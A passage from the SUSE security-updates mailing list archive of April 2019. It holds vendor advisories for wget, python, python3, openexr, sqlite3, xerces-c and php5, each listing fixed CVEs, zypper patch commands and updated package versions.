Rating:             important
References:         #1131493
Cross-References:   CVE-2019-5953
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for wget fixes the following issues:

  Security issue fixed:

  - CVE-2019-5953: Fixed a buffer overflow vulnerability which might cause
    code execution (bsc#1131493).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".

  Alternatively you can run the command listed for your product:

  - SUSE OpenStack Cloud 7:

    zypper in -t patch SUSE-OpenStack-Cloud-7-2019-956=1

  - SUSE Linux Enterprise Server for SAP 12-SP2:

    zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-956=1

  - SUSE Linux Enterprise Server for SAP 12-SP1:

    zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-956=1

  - SUSE Linux Enterprise Server 12-SP4:

    zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-956=1

  - SUSE Linux Enterprise Server 12-SP3:

    zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-956=1

  - SUSE Linux Enterprise Server 12-SP2-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-956=1

  - SUSE Linux Enterprise Server 12-SP2-BCL:

    zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-956=1

  - SUSE Linux Enterprise Server 12-SP1-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-956=1

  - SUSE Linux Enterprise Server 12-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-2019-956=1

  - SUSE Linux Enterprise Desktop 12-SP4:

    zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-956=1

  - SUSE Linux Enterprise Desktop 12-SP3:

    zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-956=1

  - SUSE Enterprise Storage 4:

    zypper in -t patch SUSE-Storage-4-2019-956=1

Package List:

  - SUSE OpenStack Cloud 7 (s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

  - SUSE Enterprise Storage 4 (x86_64):

    wget-1.14-21.10.1
    wget-debuginfo-1.14-21.10.1
    wget-debugsource-1.14-21.10.1

References:

  https://www.suse.com/security/cve/CVE-2019-5953.html
  https://bugzilla.suse.com/1131493


From sle-security-updates at lists.suse.com  Tue Apr 16 13:11:54 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 16 Apr 2019 21:11:54 +0200 (CEST)
Subject: SUSE-SU-2019:0961-1: important: Security update for python3
Message-ID: <20190416191154.8B5DEFDF1@maintenance.suse.de>

SUSE Security Update: Security update for python3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0961-1
Rating:             important
References:         #1129346
Cross-References:   CVE-2019-9636
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Module for Web Scripting 12
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for python3 fixes the following issues:

  Security issue fixed:

  - CVE-2019-9636: Fixed an information disclosure because of incorrect
    handling of Unicode encoding during NFKC normalization (bsc#1129346).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".

  Alternatively you can run the command listed for your product:

  - SUSE OpenStack Cloud 7:

    zypper in -t patch SUSE-OpenStack-Cloud-7-2019-961=1

  - SUSE Linux Enterprise Software Development Kit 12-SP4:

    zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-961=1

  - SUSE Linux Enterprise Software Development Kit 12-SP3:

    zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-961=1

  - SUSE Linux Enterprise Server for SAP 12-SP2:

    zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-961=1

  - SUSE Linux Enterprise Server for SAP 12-SP1:

    zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-961=1

  - SUSE Linux Enterprise Server 12-SP4:

    zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-961=1

  - SUSE Linux Enterprise Server 12-SP3:

    zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-961=1

  - SUSE Linux Enterprise Server 12-SP2-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-961=1

  - SUSE Linux Enterprise Server 12-SP2-BCL:

    zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-961=1

  - SUSE Linux Enterprise Server 12-SP1-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-961=1

  - SUSE Linux Enterprise Server 12-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-2019-961=1

  - SUSE Linux Enterprise Module for Web Scripting 12:

    zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-961=1

  - SUSE Linux Enterprise Desktop 12-SP4:

    zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-961=1

  - SUSE Linux Enterprise Desktop 12-SP3:

    zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-961=1

  - SUSE Enterprise Storage 4:

    zypper in -t patch SUSE-Storage-4-2019-961=1

Package List:

  - SUSE OpenStack Cloud 7 (s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-dbm-3.4.6-25.24.1
    python3-dbm-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1
    python3-devel-3.4.6-25.24.1

  - SUSE Linux Enterprise Software Development Kit 12-SP4 (ppc64le s390x x86_64):

    python3-devel-debuginfo-3.4.6-25.24.1

  - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-devel-3.4.6-25.24.1

  - SUSE Linux Enterprise Software Development Kit 12-SP3 (ppc64le s390x x86_64):

    python3-devel-debuginfo-3.4.6-25.24.1

  - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

  - SUSE Enterprise Storage 4 (x86_64):

    libpython3_4m1_0-3.4.6-25.24.1
    libpython3_4m1_0-debuginfo-3.4.6-25.24.1
    python3-3.4.6-25.24.1
    python3-base-3.4.6-25.24.1
    python3-base-debuginfo-3.4.6-25.24.1
    python3-base-debugsource-3.4.6-25.24.1
    python3-curses-3.4.6-25.24.1
    python3-curses-debuginfo-3.4.6-25.24.1
    python3-debuginfo-3.4.6-25.24.1
    python3-debugsource-3.4.6-25.24.1

References:

  https://www.suse.com/security/cve/CVE-2019-9636.html
  https://bugzilla.suse.com/1129346


From sle-security-updates at lists.suse.com  Tue Apr 16 13:12:36 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 16 Apr 2019 21:12:36 +0200 (CEST)
Subject: SUSE-SU-2019:0954-1: Security update for openexr
Message-ID: <20190416191236.F1A39FDF1@maintenance.suse.de>

SUSE Security Update: Security update for openexr
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0954-1
Rating:             low
References:         #1113455
Cross-References:   CVE-2018-18444
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for openexr fixes the following issues:

  Security issue fixed:

  - CVE-2018-18444: Fixed an out-of-bounds write in makeMultiView.cpp
    (bsc#1113455).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".
  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

    zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-954=1

  - SUSE Linux Enterprise Module for Desktop Applications 15:

    zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-954=1

Package List:

  - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

    openexr-2.2.1-3.3.11
    openexr-debuginfo-2.2.1-3.3.11
    openexr-debugsource-2.2.1-3.3.11
    openexr-doc-2.2.1-3.3.11

  - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

    libIlmImf-2_2-23-2.2.1-3.3.11
    libIlmImf-2_2-23-debuginfo-2.2.1-3.3.11
    libIlmImfUtil-2_2-23-2.2.1-3.3.11
    libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.3.11
    openexr-debuginfo-2.2.1-3.3.11
    openexr-debugsource-2.2.1-3.3.11
    openexr-devel-2.2.1-3.3.11

References:

  https://www.suse.com/security/cve/CVE-2018-18444.html
  https://bugzilla.suse.com/1113455


From sle-security-updates at lists.suse.com  Wed Apr 17 10:10:08 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 17 Apr 2019 18:10:08 +0200 (CEST)
Subject: SUSE-SU-2019:0973-1: moderate: Security update for sqlite3
Message-ID: <20190417161008.A3C29FDF1@maintenance.suse.de>

SUSE Security Update: Security update for sqlite3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0973-1
Rating:             moderate
References:         #1119687 #1131576 #987394
Cross-References:   CVE-2016-6153 CVE-2018-20346 CVE-2018-20506
Affected Products:
                    SUSE Linux Enterprise Server 12-LTSS
______________________________________________________________________________

  An update that fixes three vulnerabilities is now available.

Description:

  This update for sqlite3 fixes the following issues:

  Security issues fixed:

  - CVE-2018-20506: Fixed an integer overflow when the FTS3 extension is
    enabled (bsc#1131576).
  - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3
    (Magellan) (bsc#1119687).
  - CVE-2016-6153: Fixed incorrect permissions when creating temporary files
    (bsc#987394).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".

  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Server 12-LTSS:

    zypper in -t patch SUSE-SLE-SERVER-12-2019-973=1

Package List:

  - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

    libsqlite3-0-3.8.3.1-2.7.1
    libsqlite3-0-debuginfo-3.8.3.1-2.7.1
    sqlite3-3.8.3.1-2.7.1
    sqlite3-debuginfo-3.8.3.1-2.7.1
    sqlite3-debugsource-3.8.3.1-2.7.1

  - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64):

    libsqlite3-0-32bit-3.8.3.1-2.7.1
    libsqlite3-0-debuginfo-32bit-3.8.3.1-2.7.1

References:

  https://www.suse.com/security/cve/CVE-2016-6153.html
  https://www.suse.com/security/cve/CVE-2018-20346.html
  https://www.suse.com/security/cve/CVE-2018-20506.html
  https://bugzilla.suse.com/1119687
  https://bugzilla.suse.com/1131576
  https://bugzilla.suse.com/987394


From sle-security-updates at lists.suse.com  Wed Apr 17 13:09:49 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 17 Apr 2019 21:09:49 +0200 (CEST)
Subject: SUSE-SU-2019:0972-1: important: Security update for python
Message-ID: <20190417190949.EE3F1FDF1@maintenance.suse.de>

SUSE Security Update: Security update for python
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0972-1
Rating:             important
References:         #1129346 #1130847
Cross-References:   CVE-2019-9636 CVE-2019-9948
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

  An update that fixes two vulnerabilities is now available.

Description:

  This update for python fixes the following issues:

  Security issues fixed:

  - CVE-2019-9948: Fixed a 'file:' blacklist bypass in URIs by using the
    'local-file:' scheme instead (bsc#1130847).
  - CVE-2019-9636: Fixed an information disclosure because of incorrect
    handling of Unicode encoding during NFKC normalization (bsc#1129346).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".

  Alternatively you can run the command listed for your product:

  - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

    zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-972=1

  - SUSE Linux Enterprise Module for Desktop Applications 15:

    zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-972=1

  - SUSE Linux Enterprise Module for Basesystem 15:

    zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-972=1

Package List:

  - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

    python-debuginfo-2.7.14-7.11.1
    python-debugsource-2.7.14-7.11.1
    python-demo-2.7.14-7.11.1
    python-idle-2.7.14-7.11.1

  - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):

    python-doc-2.7.14-7.11.2
    python-doc-pdf-2.7.14-7.11.2

  - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

    python-debuginfo-2.7.14-7.11.1
    python-debugsource-2.7.14-7.11.1
    python-tk-2.7.14-7.11.1
    python-tk-debuginfo-2.7.14-7.11.1

  - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

    libpython2_7-1_0-2.7.14-7.11.1
    libpython2_7-1_0-debuginfo-2.7.14-7.11.1
    python-2.7.14-7.11.1
    python-base-2.7.14-7.11.1
    python-base-debuginfo-2.7.14-7.11.1
    python-base-debugsource-2.7.14-7.11.1
    python-curses-2.7.14-7.11.1
    python-curses-debuginfo-2.7.14-7.11.1
    python-debuginfo-2.7.14-7.11.1
    python-debugsource-2.7.14-7.11.1
    python-devel-2.7.14-7.11.1
    python-gdbm-2.7.14-7.11.1
    python-gdbm-debuginfo-2.7.14-7.11.1
    python-xml-2.7.14-7.11.1
    python-xml-debuginfo-2.7.14-7.11.1

References:

  https://www.suse.com/security/cve/CVE-2019-9636.html
  https://www.suse.com/security/cve/CVE-2019-9948.html
  https://bugzilla.suse.com/1129346
  https://bugzilla.suse.com/1130847


From sle-security-updates at lists.suse.com  Wed Apr 17 13:23:51 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 17 Apr 2019 21:23:51 +0200 (CEST)
Subject: SUSE-SU-2019:0971-1: important: Security update for python3
Message-ID: <20190417192351.3F062FDF1@maintenance.suse.de>

SUSE Security Update: Security update for python3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0971-1
Rating:             important
References:         #1129346
Cross-References:   CVE-2019-9636
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Development Tools 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

  An update that fixes one vulnerability is now available.

Description:

  This update for python3 fixes the following issues:

  Security issue fixed:

  - CVE-2019-9636: Fixed an information disclosure because of incorrect
    handling of Unicode encoding during NFKC normalization (bsc#1129346).

Patch Instructions:

  To install this SUSE Security Update use the SUSE recommended installation
  methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-971=1 - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-971=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-971=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-testsuite-3.6.5-3.11.1 python3-testsuite-debuginfo-3.6.5-3.11.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): python3-doc-3.6.5-3.11.2 - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-tools-3.6.5-3.11.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libpython3_6m1_0-3.6.5-3.11.1 libpython3_6m1_0-debuginfo-3.6.5-3.11.1 python3-3.6.5-3.11.1 python3-base-3.6.5-3.11.1 python3-base-debuginfo-3.6.5-3.11.1 python3-base-debugsource-3.6.5-3.11.1 python3-curses-3.6.5-3.11.1 python3-curses-debuginfo-3.6.5-3.11.1 python3-dbm-3.6.5-3.11.1 python3-dbm-debuginfo-3.6.5-3.11.1 python3-debuginfo-3.6.5-3.11.1 python3-debugsource-3.6.5-3.11.1 python3-devel-3.6.5-3.11.1 python3-devel-debuginfo-3.6.5-3.11.1 python3-idle-3.6.5-3.11.1 python3-tk-3.6.5-3.11.1 python3-tk-debuginfo-3.6.5-3.11.1 References: https://www.suse.com/security/cve/CVE-2019-9636.html https://bugzilla.suse.com/1129346 From sle-security-updates at lists.suse.com Wed Apr 17 16:09:01 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 18 Apr 2019 00:09:01 +0200 (CEST) Subject: SUSE-SU-2019:0977-1: Security update for xerces-c Message-ID: 
<20190417220901.B4C7BFDF1@maintenance.suse.de> SUSE Security Update: Security update for xerces-c ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0977-1 Rating: low References: #1083630 Cross-References: CVE-2017-12627 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for xerces-c fixes the following issue: - CVE-2017-12627: Processing of external DTD paths could have resulted in a null pointer dereference under certain conditions (bsc#1083630) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-977=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-977=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): xerces-c-3.1.4-3.3.25 xerces-c-debuginfo-3.1.4-3.3.25 xerces-c-debugsource-3.1.4-3.3.25 xerces-c-doc-3.1.4-3.3.25 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libxerces-c-3_1-3.1.4-3.3.25 libxerces-c-3_1-debuginfo-3.1.4-3.3.25 libxerces-c-devel-3.1.4-3.3.25 xerces-c-debuginfo-3.1.4-3.3.25 xerces-c-debugsource-3.1.4-3.3.25 References: https://www.suse.com/security/cve/CVE-2017-12627.html https://bugzilla.suse.com/1083630 From sle-security-updates at lists.suse.com Thu Apr 18 10:11:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 18 Apr 2019 18:11:54 +0200 
(CEST) Subject: SUSE-SU-2019:0985-1: moderate: Security update for php5 Message-ID: <20190418161154.86907FDF1@maintenance.suse.de> SUSE Security Update: Security update for php5 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0985-1 Rating: moderate References: #1126711 #1126713 #1126821 #1126823 #1127122 #1128722 Cross-References: CVE-2018-20783 CVE-2019-9020 CVE-2019-9021 CVE-2019-9023 CVE-2019-9024 CVE-2019-9641 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Module for Web Scripting 12 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for php5 fixes the following issues: Security issues fixed: - CVE-2019-9024: Fixed a vulnerability in xmlrpc_decode function which could allow to a hostile XMLRPC server to cause memory read outside the allocated areas (bsc#1126821). - CVE-2019-9020: Fixed a heap out of bounds in xmlrpc_decode function (bsc#1126711). - CVE-2018-20783: Fixed a buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1127122). - CVE-2019-9021: Fixed a heap buffer-based buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1126713). - CVE-2019-9023: Fixed multiple heap-based buffer over-read instances in mbstring regular expression functions (bsc#1126823). - CVE-2019-9641: Fixed multiple invalid memory access in EXIF extension and improved insecure implementation of rename function (bsc#1128722). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:
      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-985=1
   - SUSE Linux Enterprise Software Development Kit 12-SP3:
      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-985=1
   - SUSE Linux Enterprise Module for Web Scripting 12:
      zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-985=1

Package List:

